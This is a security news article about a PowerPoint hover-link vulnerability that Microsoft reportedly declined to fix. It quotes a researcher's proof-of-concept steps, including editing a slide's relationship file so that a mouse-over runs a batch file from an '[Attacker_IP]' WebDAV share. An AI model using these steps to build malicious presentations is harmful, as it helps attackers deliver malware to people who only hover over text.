PowerPoint Vulnerability Allows Mouse-Over Attacks By Installing Malware

A researcher has found a serious vulnerability in PowerPoint which can allow installing malware with mouse-over attacks. Ironically, despite being a serious issue, Microsoft refused to patch the flaw.

PowerPoint Bug Triggering Mouse-Over Attacks

Reportedly, security researcher Mandar Satam has found a bug affecting PowerPoint that allows mouse-over attacks. This allows an adversary to craft a malicious PowerPoint document that would, in turn, execute malware.

He has also shared a detailed proof-of-concept regarding the exploit. There, he referred to a bug reported in 2017 that allowed the execution of malware whenever a user would hover over the mouse on a hyperlink in the malicious PowerPoint file. While Microsoft patched that flaw, he has now come up with an extension for it. An attacker may simply use the “hyperlink to” option in PowerPoint to link another file in the ppt.

Instead of using “Run Program” action we use “HyperLink To” action and set it to an “Other file”
Then we can select a file within the system.
Save the Powerpoint file as PPSX or PPS

Then, a few more steps allow the attacker to exploit that flaw again. As stated by the researcher,

Then open the PPSX file using a ZIP program and change the value in “\ppt\slides_rels\slide1.xml.rels” of rID which is connected to your mouse over event to “file:///[Attacker_IP]\webdavfolder\file.bat”

This way, the attacker bypasses the limitation of not linking a remote file to the ‘Hyperlink’ feature set by PowerPoint. Hence, an executable link can be included in a ppt file which would then trigger mouse-over attacks.

Due to the way SMB connections work in Windows 10, SMB connections over Internet are possible even if SMB ports (445/139) are closed if a webserver supporting WEBDAV extension is hosted by an attacker.
Now hover over your the text and observe that user just needs to acccept the pop-ups and this allows the program to be executed.

Microsoft Refused A Fix

When the flaw surfaced online back in 2017, Microsoft patched it in PowerPoint. However, now that it reappears in a modified manner, Microsoft has allegedly denied the fix. According to the researcher,

MSRC was contacted about the vulnerability, but they decided to ignore it and stated that since it requires social engineering attack, they are not willing to fix it.

Yet, the exploit is out. Therefore, users must remain very careful while dealing with .ppt files to avoid any malware attacks.

Let us know your thoughts in the comments.

Related posts

Water Facilities Must Secure Exposed HMIs – Warns CISA

Microsoft December Patch Tuesday Arrived With 70+ Bug Fixes

NachoVPN Attack Risks Corporate VPN Clients